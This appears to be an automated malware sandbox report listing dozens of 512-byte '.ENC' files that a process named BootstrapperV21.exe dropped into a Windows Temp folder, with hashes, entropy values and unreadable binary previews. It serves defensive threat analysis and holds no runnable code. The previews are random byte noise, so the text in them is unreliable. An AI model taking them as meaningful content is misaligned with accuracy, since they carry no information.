                                                                                        Preview:..p.F"...m&w.G.H._.n....z..E....h.ke.9... ..|.i.h..."c...._[~..I.P..'._.fh:|.B.....".c .zCG.G1N....-$..Z.L...c.l.DI]q.....G....DY...p.....cx...................<j?$y.1...w;.8BL.......'. ....Y.}.......|.>...<..k..D.5.Z....p.y...9k..p./.....C.........3...._..;5...~Z.q.}C..e...-/T...$fz V..~.E..F=.Qr...5......m..?...].....#.Tg.......8wO..0.c...............cm.L..<".<.b.H=........Ao..T.h..."..4d..-....!.!yeL.....WK ai.@p:..#:....4...v...B.&..X.;.?..'~.!K.:.>.n..y..i......c^....`..h&.&

                                                                                        C:\Users\user\AppData\Local\Temp\7457734050.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.586493978840884
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:9lY2++OQqtqdN3rpNtAAMa+fXR0bHx2zHh+dG3HFxg+BVBSqv:HjIqnRAAMa+fXR0V2zB+IFxgQVBSU
                                                                                        MD5:D5F4FC9EF3CA12AD2E351E9A0CAFC1B2
                                                                                        SHA1:31AA860F1D16BBA5A7D5F6C2530F84D7C012DD87
                                                                                        SHA-256:DDEC2E9FC9B5360562F2AC3310051D2AFA77C55CFC7BA1C4912661B79812D260
                                                                                        SHA-512:D9F3A9AF4433C6EE1179FA9868CC8A800FD0288467EC1E581282FE2C8C6D0E09E04CA6F101EB5D5050E10F92FCA4352C36AF38F12373077CC4F76A51BEAD2D5E
                                                                                        Malicious:false
                                                                                        Preview:N..J.I.3AYB....z.3...\..R..A.r.K._.\.X..*.l4....$...7Y......v.t.X.u ...h.a....J.vi..Zs...a....z...Cg....<.[.i.V.....]..W..!..*h....s%?j^.N.u^.....N..S..D7..M.b...N]..3B...H......C..Z..N.9..N....B.:.....hkA.1....[.x..>.\....up..LNbF.....>q"..<.B..3....7....q..!Vo..i...(...].Z.?0..G....-.<msK..3*.|.u.....11/..c.....c.{..... -O.......`#.U+..R.....8..,.....g.e...vq.........N...$.%......RV../.`....y.8......QX.%.de)'..v....4J.%-.c.].....`...T..#...P.....FV....uH.d.XZ$.+..#......MG.r.

                                                                                        C:\Users\user\AppData\Local\Temp\7676687441.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.598357326343123
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:hnOVSmwUdIhlVV5vXY8ZUCr6Ah4313L0VR1Z7P3eJONkg:lOVSmHalVjlZUHNmFPOJOL
                                                                                        MD5:098FD2EFA7B9F8318D29EE8A40FF0893
                                                                                        SHA1:6D509BBF6EA8626C9EADFF9A4777D4D2CBB6960A
                                                                                        SHA-256:3F8613038747CD4D4AA76DCBA122DFE5A40A50EB810C901CC67E72D529134750
                                                                                        SHA-512:189CF10F2DAD9669C97F3BC0A529F5B6BCBC6798B67EAB3E9A94C4B476105B92197FAF666970DBCD6FEB51E27CBEB96F317589AA1EDC2F741959771E7A5FF2A1
                                                                                        Malicious:false
                                                                                        Preview:s..q..T.....o..x..KD./\....N.$.....}..|..?..B.$.q2U.....#..D......M...]......+Z...1..<..c...6Q|.G.L.....|....M.{.z.y...K3..s|..z.....6.W9C0N5..Z..&.... P<..^.v..`e.r_a.d._$.e8..%.{.p/.W..l..R....,'.....s.HG.c...R.....U.v..P...f.lB.w9r.W.g..1.L.._..0.-..&p.Iy@.6.Ld....Q[G.5A...I..yR..8V05.^$$.pF..P.A'.BY......s...io.G.l...x................,%....4...EK....>u..`.9..K0qM}.l(LG.8.....O\..........e.N.......Z{..ph...Q_.....o..(fT..g........"....PR..IT..k........~\....&....`.D.>..-N.W.

                                                                                        C:\Users\user\AppData\Local\Temp\7847944919.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.59186112225111
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:IbSmpkGfAvOAKE437d68a1Sr8jRg5G4HlPSWp:oSmp9A275rdDOu04FP9
                                                                                        MD5:24EA10C850ED917D54FD731A5FF7DE2A
                                                                                        SHA1:26DDA7B92163B1E8D63F170F316856E00399C0D2
                                                                                        SHA-256:4F999FF15BCB1CBE1ADDBD109CEF2DB0DBACC626F711487A78F7323762DF5513
                                                                                        SHA-512:48F3DCDDABAEBA4E205D13EA0768E9A735F3A4F60B58CE6000A69B938DC381E1C030A190F5326211743AFB7D254D5916E28158D034F60975B3C6D691583C1F4A
                                                                                        Malicious:false
                                                                                        Preview:........\....^.......$.*.PaY.^..b.8..5...b..?.7.|..x.]e..!e.....n.uLV.d..]....d..._ur.......5..@......Y...V.H[...Q..n.K...7.oE.......6.{U'4j.3.d......Xnu..p."."%.'.&+...x..,L.....i..O.g.....~2....[.>\..#P^.ww.Q+...O.{.g...lyX.w.-.d..G"E.....S({....L$.(.H.`P.].....?'ddL..z`)....-6......../3bl...M..Q..J.9....W...@......;.......:....M...&.>..W/...(.LE.....o..<1..U.\.0.J....d."N5.....-...'W....(\....e....`3.i4L....V...~x.Sx...wu..k/<2....l....w....}.6. <.++.......{..Y..m.XC.#O.

                                                                                        C:\Users\user\AppData\Local\Temp\8182259827.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.595944643960552
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:w2wRoy0c81U8EoLZpBkmIGpMnZChxoxeD2vpZATKWFPkOgkOWGY:wxR8HlTLb6hG8ZCvoxe6vBWhlsdY
                                                                                        MD5:0D01B1AB79ABCAA48AAF43E64B8A881A
                                                                                        SHA1:D8753273C99544E605B2BB1C4B576C29B57ED770
                                                                                        SHA-256:D8FCD7D23D43DD51ABAF25EFDC2D8FF1F7ABD3E2A2954E24FF601B8D58321B55
                                                                                        SHA-512:127BC42125DE3BC39C9564220CEED2B965FB8597880900915420F94CB100D3C14C2C1F9D67CDA7C5815F02F7D7533E3F44272AC9A31B3A768F46BF380BB26125
                                                                                        Malicious:false
                                                                                        Preview:.;..b\l...h..!...........+.,5..|J.W.K....lM.kr..4r.....U[>d ......vV.~.t{W.3.W../1KttR.N.WK.c..'.).."..4#.)..^.....m.Or.........4..'.w.S<^1]...%..Xx}B$.......[..RO0.r.>..............w...ck9.].)....ABt!.G...U.M|I./..I.i/...".&G..e......j...V#.h.......Z..)..D50-.....V.!.o..7.zM..&...[.5..F\2'...7...M............h......q.3B...%..g.^.(....[.m.q.u...T.s.a.d|..........&.G.w.I}.......{.O.x.\......M.[O>#..O.....2.1...:}....be.ZM...... ...K.d.....6L._...}..j.#.....N..R p,X^.lr*.$E.*..v.-..

                                                                                        C:\Users\user\AppData\Local\Temp\8200946536.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.604796341178596
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:dKOVoCxaRP0Lbk7g3ie0G/7Y01VNM4Tcr5NjniSGrUMeoDU:EsoCx+03zQq917651xUUfow
                                                                                        MD5:9DF54ADA0F6130E9F22AB8C541529780
                                                                                        SHA1:05A6C1797A0DE0E7BC69C8BEE96A85902277B68F
                                                                                        SHA-256:BF1AB4F9F3F2EC2BE28C5D8AA9E5831C9C2EFBAE938A93B98ABDCCD897366745
                                                                                        SHA-512:C24C64FC1B6C954E2FF923E5F05ED7517F2CCFF9FF77FF58D150C3051A9FD59B7C491C710979BCCF4DECE059768AF720DEEA4FF21632267B890D176B7FCE549C
                                                                                        Malicious:false
                                                                                        Preview:.....7..=..._9....F~...<..A....UC..,;._...3.9.F..k+.l.......>.7.._...T..f:y.bf ...K.By.4...B.......0K..vuH1.9.A......p8<...=.H5a.NY...,.s..'.(..g>..#T.s..'z...`.qfI..l...F..Gb~.E......^..w0.........M.j.*k./.D......5.s.5...a.R......(....9x.0....#.:.<~.T.Y.{].u.._s.^.:N.e..b0...W.\+-..\V..K.....*....$|nD.T..(.^....wQ~I0..}.L[......>..W.*..pc.Lx...B:L.+T@?`ut.J.2%x...u)...w..|...G{.MQ.[d.>\p.l/..F...g&/.@..?d.+[.z}=K~iI...|.}"F)k..:.R.fv..6.e-%..k/c......w.M.s..y.e-q.z.{VU.u../.....NT<g|f

                                                                                        C:\Users\user\AppData\Local\Temp\8351801105.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.608161134953775
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:DeqApK3Kh6UOk9Ma1gnGwR9FuheMbZ99Whd+YAoeDg:DeqAp56UCXj+bZDWhd1Adg
                                                                                        MD5:882775C254B697A6AC448ADB2C4E04E3
                                                                                        SHA1:5C7C78ADC52CD51780F7D71B9C8759AB720EE8F8
                                                                                        SHA-256:120049289778568319A366757465ECFFFF2F7C893CCF0F0221792690331C68B8
                                                                                        SHA-512:58202E206FD23EA6387A52CC87137F5EE9AA1E4C6690D1F6F314D36EDE55ED1DEA830062EB0109D08328FFB7D70E31C2BB1CE3A9E8B48818B6EDAEDF5B15DA7D
                                                                                        Malicious:false
                                                                                        Preview:u..P.>;..W....K...J...4..Qo.VQ:........'.\/..$]Qf/6..#..3.zN....v....,A..#q{u......2.....}.....p.3..vZ1..f.:.......1V@.a7..o......3...TtA,V._....I#b....h.Fi.........fw.....p.u.W+..y..wAp.@U../6.P^..+j.C.O->w.h...Y...%.kzJ#GI.Re..l..*.2&......Edt.AJ%g..],...$.]..~......1.$.$.........D...V.'..n...I....0..+h.#.......X.T@.....Y{...,......|..}....r.."..9...'..E.Is.......e........;a..._...'@..Q....0..C.].......:...FO... ....D.........f.YV..Le.".L'..:..k.l..=ga;....Ir.M3../y.d..@..L.

                                                                                        C:\Users\user\AppData\Local\Temp\8492240360.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.611197322504801
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:x48wvK7ayOmrGSbWYz3NR4rBsrseeJyqT+Rd8x/:+C+y5D6YzLkuOyqKRd8x/
                                                                                        MD5:F5279A6741D2146277F448C43A7B42B6
                                                                                        SHA1:741B789636642473CAF52F4162EEC22514B8A58F
                                                                                        SHA-256:75A9CD042E643D1105D27E456F00A0AC29F898CFB14E414F38638872F64E35C7
                                                                                        SHA-512:C17E094D17F6BD813C881D73690D00FAD57C088EF45C6E576F1961EC76C619447627DFF21C376075E1EE1EDABDA5FA252037328C13EADC04F3C662D98B7AA5CE
                                                                                        Malicious:false
                                                                                        Preview:c1nD..`....p3..[\..Sf.)~..Z...Kvr.,.V..k...F;s.W..^.G;...[]<f/..[.}n....$.q.i.Y.B.....K.:.Vx.jZ<A..?.l.B.[....;......Sn....!..1'Z.TyF.^..\..'k4.....b.w..b.5..sfQp...9...9m.0..mdE-.w8...\.....v.{...M4c6.g.k...[...k....'.^.[.@..O.....}.......][._.N.....Z.........-.]..1.Q.D......zk@...@..H.......w|.b|plh.~....~~6....U.pd..K*..-.|6...i.....M4.i...9..V...."dV....7)..V..".Uj.....o...^<...6.h..._...K......].S..k.:l(.'@C..w,....F/..bz.4..e2..../.....P.oF).y..4....O...*@~.s..A&.P...x*.O\.

                                                                                        C:\Users\user\AppData\Local\Temp\8552718761.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.624385102855398
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:JsRSli4+YoBDF+HskloDfKdJeGhwngjdgfVkHKqWA:JsybfeIHskloTKdJeGhm9tcKqWA
                                                                                        MD5:E81D3686A90310BB6039C845EAD9B3AE
                                                                                        SHA1:C9C4CB760DA90186BACD7B8930D22AC2BA455396
                                                                                        SHA-256:062C721075B8454586C40C07CB2B06FD3F59008D4C9128991AB7861DDA995DB3
                                                                                        SHA-512:CE31C34C0064127BEA799274859EE7327D6CE31848860183CC7896A89211F5B82C330F04D45B820D02F4A167AE44A1D7C088C9E6F0C5D581D7830E867039E7F6
                                                                                        Malicious:false
                                                                                        Preview:...B:l..2..Y.\...."..>,....8]...>...X.p3F..v.).n....$.&_4.Y....\.^.bT...B.?S..8Q.`-.MA...[..E.....J.<C......R1....v.3.|'.Id.c.+..'yd.Gj:..%"-8......T..K..k....f..a......9.......li.m...#... .P..../....$......<]..U.#..ej]...L}..z....m1....a..d.@.W_.Xe...~.A..z......p............g!...D;.\4...PwP...y.eX/=.....5...&...Y.2..[R{C........I.....M.....t...4P.s.?.F..t:j?..dFf9..C...a..B.Ox.}Z.Q\).............].&d<.+t..E(2..}.{<u.....3J.-....G........BM....?.....%h'.".......a....nwve......

                                                                                        C:\Users\user\AppData\Local\Temp\8784112376.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.5879807872283465
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:MooQlBlflfMFVjGTbSi+m2+ziYbW9bS65x5yLUWwgN7dkp:MooQzlfl0XjKuipigSbS65xo6gNhkp
                                                                                        MD5:B6F43A28142AF0740E559BB77A91634F
                                                                                        SHA1:2DA45DA1BF89EC87094F2F459A384DBD923D04EA
                                                                                        SHA-256:121158A8CF68017293CD6BA6609D083A30C33EE81774D324CC7FF2A7A0E2AF0F
                                                                                        SHA-512:6CF9DC7E015CDCFB6F7439C094EE720A95D7C37DEBF4778C1615153FA8902B53B789FD6C8CC3E1E2C8D17DFB2DDBE35C90FE5A0B37C7925AB9D2DB9AC614BB41
                                                                                        Malicious:false
                                                                                        Preview:>..+.....gi......`g.F..~.....>..#8....N.F.2.V..9+...'.)z...e.....FQ..`..+..Iy...n...E!FU...x._..c..\.\n.K....y.h .......+.2..+9..`={b....!{......'Y...;.4......C..6.....j.N........53..b.."..=w.&i.\..:.......-..[3...?Rb..&*..UJ.{J/.........o\G;7...S)5.W....+W..F%..H...p.d.T ....Ou2.../.iKKr.k.+.j.dG...X..SS9.*.....I{...~.x)..A..w.3y.B.(.#..n.`.Dz.A.$Op..x.._?...p|W....9b...%..&..oF_...qD}..g4....._.O';....2...zP$....o.).....3.w.......e.>...r5...Q.u..q1..X~.V.&..i.:'.N}........<....J..

                                                                                        C:\Users\user\AppData\Local\Temp\8886835349.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.558831137267502
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:yhoQAorNSzsknSV2G0qPH7xmi/s77e0kW3q+wPSre+U7HL/:BQRNSszT8i/s7CWqnSrqbL
                                                                                        MD5:2CBB6B66C2D87783CF6937FB76EBDA8C
                                                                                        SHA1:64058E5DE3AE7B6060C20734E94D6B7D626D6FFC
                                                                                        SHA-256:0DE0B83E650A2269C590DB37EAAD03213594E3B7800EBBF7662C166FCB3F2ABB
                                                                                        SHA-512:8548016DC52859C907FBB7F69636C750A95B3CE606AD51E161ADE95A1272DC865A776A76B17ADAB0C81AACAF94CC26DC8E840872BD37DF1E4C1CA050ABE76CEB
                                                                                        Malicious:false
                                                                                        Preview:G....=...5..Wt.....M.%..)...{....<s%..=&.)s...),..Y.Q.G.../.z...*.].7:.&=..:.Jz....7.u.5.......u..tG....{n..o;........b...U_^3Gq.f.{....S.>...uK..va.ZEWh...$.{..Z......:.zc.L.."c...-.._....w+<....../....dR.../..~.'.73.....j...zBj.4..z ..........^..G.)._....s_....V..D.pf..]}O..\|..O.^![....e..d:T.4N3%%...C.#w.f..0.-afV.....C5u.r..r.DF.e...x{.V.+{-J.K..CT3@.w..D..b.D..Ai.T.Zj..oy..[%l..f...9.C.;.#oj...#.....@f......7.p../.!.V......T..{.ZQ......w......L....B.J..Y-o$[...w......_......$/

                                                                                        C:\Users\user\AppData\Local\Temp\8975065801.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.596334743453168
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:o+79zswkycGlBMNvk4j/nUeWXg9PnUwA9NlEywaIyACFNra6:H7FGiD6k4j/nUeX4NlEy7Nl
                                                                                        MD5:CF8734AB87A00331860942FBBFD0DC53
                                                                                        SHA1:6A85794F52E2FF034B21EA481FF56A570ECBAED9
                                                                                        SHA-256:0569B1DA22A5CADE34BA880D5EBE69B63D563FA8CB1ED193EB5EBF1386F1F8EA
                                                                                        SHA-512:390ADF77B106A5C1F57079B33ADAFA6F83698CB9BB477E4E94D18AD5CC184863B371B17A5BFE96DDB3A32C570FC35EAD1492236A142D051C023A8571282E82DE
                                                                                        Malicious:false
                                                                                        Preview::|.j.{.R.,COVjq......dh*...*..%.....W...u.h...OgCv,N......wH`g..6.M..... I..e.9...1.;c^..)......)P...!>..g0.B..UA..6.P5.......|7;q/[T.t.r......lY..bD.."|2`...'..d....^4.#...%x&S...)...66.%)..#&a,[1e..F.K...er.Au.j>....{..I..l)1..''a(85..<".\.!.u..w7.3..\..+..B....7zK.R.4.^T._..j..*.8.6.U..9....3._AP.S_..b.w.G...A.....gd+.V.x.wt.:!.[.. T.4....^h.yD.Ex..G."R).P.4....~..$..4..~.Q...3LF.L.y.>..].....H..Xa.}.......k...8...v...KLe..[..W..^...f...%....j.H...9....Th....E.............."...B

                                                                                        C:\Users\user\AppData\Local\Temp\8995528179.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.602155934842516
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:5TQePSUvuLcJA9+l+8W7uzUuCcK5i8gCUCMc1DWxF:NQePnicJA9+jWyUuHKtkGpWxF
                                                                                        MD5:9E14E7E7F27AB84A6BEDDB7AA3144F89
                                                                                        SHA1:98AAA183D0F82F85ED775CCE6743C74FE6A07089
                                                                                        SHA-256:9346A0F688C2CA93165A3E898861740AA88B1D58C9DCB5AEAA1B1270FDA807EE
                                                                                        SHA-512:0A7C8D0567938EDF6CB59058914CE1FEE5EC7E78C6AE78AFC9EC85D0DA32AF0BB82B4ECA20D12AE85ACB7F2FB1749B28ED1C977C739C44A0EF919BAB73D1F63D
                                                                                        Malicious:false
                                                                                        Preview:...l.u...j..a.;.;..w.T..Jxn.....p..h.I6..U^...4..m1..[s.?.. .+.O.W..*.n5.C0.=..n.&..z.>..rc.E$6...,.G.dZ8i...\q.)....r...fA.^.:..}...V.8a.......Qn .U.....:.Z....@f...v)..Gfi....h.sK!..~.S/.;..H...`.%8...2..06Lf'B......+..P..?v........+..*.K...._u..."...2.|.N..Z^..Hy/..2........LA.....!...Ng.}.4.%+.d...BV..;/y.t...T1.?......T9..&.. ...1.....p)...1.....0.....nX...~|0....8.....oS@N..K.........@*&.e=....8.EF...S.p..a....0B.8Hp.$.(.........d.....[..D..........p.6.a.xWwy...c3.z...P

                                                                                        C:\Users\user\AppData\Local\Temp\9217021447.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.596284291209099
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:EjlDRbyrEuv7ZVR0YNViCeMs9Q4jY5p+59E01d0LdC/cITdhaPAVbRuj:EjlDRW5jZVR0YHiCyy+59bOdC0caPADe
                                                                                        MD5:19DA2850CD854F81D2A676AC1EF3386A
                                                                                        SHA1:EEA4BF38E1503C3BFAA182E0C033EFD76D3F5AC1
                                                                                        SHA-256:035A1BA028CCA4119D69EA01BFBB1786765F97BF0D172CC25F5CBACB23B83594
                                                                                        SHA-512:35FEF6C576AD8FC9CB472DF69DB9CF864002E0A1FE98A32ED9DFE607B95157BA256636D96A9554D8216A3DD28C6D7E1871A7531C3D6D0198694FDECAC967CD84
                                                                                        Malicious:false
                                                                                        Preview:.....M:1.....L.....?E.%..D.....J/>....v.U...rw....x./..W$....#IC...r.U.......... ....#.........;...[.}....p..1..G'>.D.......}...R..dB+..$.^.:.....=..c1...mT.x.n.5..e[^..s..~6y..E..Z.t..Mw...F....:{ p?.0<...J.&#[Q.......'\?z..(...H...T.......\.).2...>5.H\B.y.n.]FA....d.......qxW..@Z..(}..6.D..B..w....p.#iu....P*.g..xE..n..~..N...=..p.sz...z..iS....[..m..p.L......H....6....H.j.0........M...^...diE(.o.m..<.... ..Li...p..s.#..j.....ep:A..7.cZ.%.c."...<5..o..qEP>.f{.T..DY..N..4hH.c.j..o).9.

                                                                                        C:\Users\user\AppData\Local\Temp\9275373402.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.597128438680837
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:wmhXqkw6msVrFcgkkvS0IskT4lFVnndaS6B1haHrtXZt:3BLBLFaUHtnZ41hWX/
                                                                                        MD5:972ED0306B814BE8E78AE4816EC77C75
                                                                                        SHA1:CA7A5043B13F871585138E03F5984019C2DF3330
                                                                                        SHA-256:99E9EC6E9B3C562862F58D8B47CBD082057FC24321B9C7F70D3A1334DFB9026F
                                                                                        SHA-512:795DC46E532F4476E745566768791E2DE96060DAC1C8E5BC810CCDC0F7F67FE4669D5C8FDB38C011715C5A2A900BE8DE877033B027E05EA6A6BCA2EC003023E8
                                                                                        Malicious:false
                                                                                        Preview:c..K.f.....wnc...3.1.{cC..u9.....8\.5..K.4....=.J...1.+....%.7Dz$*..a|Q..Q....*\.{..[i.........$.m....Q.zS...L....[....z.*.]......85Vu._....Ao.....T..&-.2...5V..[:k....GS.x..........u.2M.......>pF0Z5...f.k...S)A.tCu%.xoZ...6...A+....Z..<.^..o....o..p..mF.T....%......ES.V..ojlx.R~.P.J{......4.....&OH..\.|.c....qU..-ND..MX....../.5.w.u!#...z?.{ ...6.r.....ij....<#..6.N...".A.N..E0.S.v..)......7...<D.q.r....^.....9oa...e.....-..M}......L.....p...w../.}.N..x..J.R.q........./....A

                                                                                        C:\Users\user\AppData\Local\Temp\9329238007.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.6057975048873745
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:LiRMEhR5SUHikdPSSIK1Ph/45qEPA2RBAhBRTj8SFLxhpFl:WRrhfx9SSgql2RBANXJFjz
                                                                                        MD5:795F5A99E31ACF2CDCFE71D770B2E965
                                                                                        SHA1:C7DD05CEACA7883415BB97EC022A7ACCAB50C32A
                                                                                        SHA-256:6B6EEDEC52E41A4BC4B22A6CCED28D9A49DAD69967ACF8B5FFC1B40D24980363
                                                                                        SHA-512:87A7D28DE826F5B6AC5B74912B14FB48D43DB5605832DE5CC1C464DF7D4F2349C0435251E1BDF407A26A781356E04B7E43C6DB2961D794FF33DB6ABA9417FAC6
                                                                                        Malicious:false
                                                                                        Preview:.:V...7.....'c..g*<.^|...T.4.7tV..=...R.7.v.!......$.^...R<...XK....Fs....7.;.uP..t.....kp/,..BJ..|.x.....'D...6.H..'...5.S.S.Bo g.*#....ybe.Y.xOF.......*3..........G..k2Mi\7....XjMg-..=...j...{&V..9 ...-S j.6..cWsle^.p..T..%$.D...U.3|....Hm....9..........Wm...u"......u...U....I.lN+.[..o{.>.BC......H.r.%....q......B.La....O.".V..E..`.b..~....E?.k>.[$p..H[,^.s....!.......A.95..?.6f......z.'..c![7..@..M..0.S...r.6...?.P...C..K......T>.=?............Pc...h..D.....#a%..U......4..e.Z..$..X...

                                                                                        C:\Users\user\AppData\Local\Temp\9422479677.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.566640859629202
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:5sKfqab5bRsUmRrq6IazR1q6fUEVc+L6R2FB6eUuqvZyePsCfCYq4:5xHNllqrq6qcn5P0uqRyOsohZ
                                                                                        MD5:52FC15052A7DB39ED3127FD5A7B5C363
                                                                                        SHA1:F1F8157517F9E577649EF5DD4BF67F5724B2A6F2
                                                                                        SHA-256:3C461A9A6F55F006562C662B85E0D00BC5B12D3B50977D0557FB8D385CB31B1B
                                                                                        SHA-512:5B18F9267689963773C44399382CC0CA3A822439164BC7C071F848B0792E49A16A52456ACF66B7E2A314882B80F82BBC01ABAA68442757AD8D332FE8C8C6D53D
                                                                                        Malicious:false
                                                                                        Preview:Z..~.\B.... ..0B$.:..)5P.Z1...o..7 .......!...-..i(.M....|..6$.f...e..JuZ......[...o..5....(....&.i....#]..CfU....=d0......2\...O.<..j.<.X......".. ....C...v..#.....$O.-'{.c..6....fu.d.M.a....+.Vo.Ce5d.U(.1..\@......&"......w.O.X9.T~....~.6..p.K...F.n.t..Y...ZiQ;.;..b..,eH-dD.N....I.P...Y....(.QmmPo.2I.M..r....=.vI..e...E....).3.aR..."?.RK.......#T....X.^..|...........G..A.......EMMr..g.............1C.j.....8.Z..-:..Xbo..s..1.P........!...9j.Z...!.T1..Ap.>4[I_m...K..a.D..FX9...V..(..

                                                                                        C:\Users\user\AppData\Local\Temp\9655434068.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.604317755932643
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:SgXFrjfP2vsaSKe40hMGD/sWyP/eUXzngXl82RZ:7FrG7SVhiGgWyPTgVv
                                                                                        MD5:9316A8250E8B962D48AC0328A42E8CA7
                                                                                        SHA1:7DDB44335C163C01AC92308260D397B1BDD45EA6
                                                                                        SHA-256:978A9B0A384968D47604F81464DB8544AFFF43FE70F80694EB2A73171112ABC5
                                                                                        SHA-512:CD85C0140417D0A2A03E1A3DA1EEEB1D39B248E8B584BE59460F98879706049F70E48BFF9AA29F4B806BAF615F65E680ABC3DCB00AB0428AB63DFA78D62A6BF3
                                                                                        Malicious:false
                                                                                        Preview:n.KcAU.s.pX..8...O..I....j.0..vH.A5........8.-!k..m.cq.Qn.;....<[.d.&R...c3..7-.....m~.r...Jn....^n....Wk6.P.'......S.z.....{.B....X$.9;>...V@...dx"O.....].....m.q..U...S...$p.ER(....v.R6.4..P.J&..='{.e...mL...v........_(....u......"d./?^<r.E.c..a..{.(.>sX...e.[T.....T..%L.*.%W.y...F.......,.F.@...XY#...9..s..N.,.6.h..{.W.D...l..?..+.\...%cQ.a..S.....>&...rO.S.HK.v:.fQh.....S..gW.)...!#k...T.".z.2.-..8....=..h.(s.M....F..z$_...A...H".@..8|...J9)..h.J*H.h.+..;_G:.]..........hk.1.T.

                                                                                        C:\Users\user\AppData\Local\Temp\9659692161.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.632601198590449
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:P4OGTtot0Ki3/LXYnI9zOERo/DnYQA2c41qP:+CXi3/LXiINOEu7TLc4IP
                                                                                        MD5:A713468D490DE33941C39D0D261578B3
                                                                                        SHA1:A08DF289215E850153F7B31F6D25FB852094A1EC
                                                                                        SHA-256:5855E146BABF5EDEA84E6B2A949B9A683DE37797DD85EAD0864D729169844B4A
                                                                                        SHA-512:5D118DDA9F466C993F6CDF3EDE64EAADD4C60FF9E9A0C582C828C5C1674F99213C4CBD68007B23FF8BBA498B50B5DF343385963994DC702174911ACFF3C69B51
                                                                                        Malicious:false
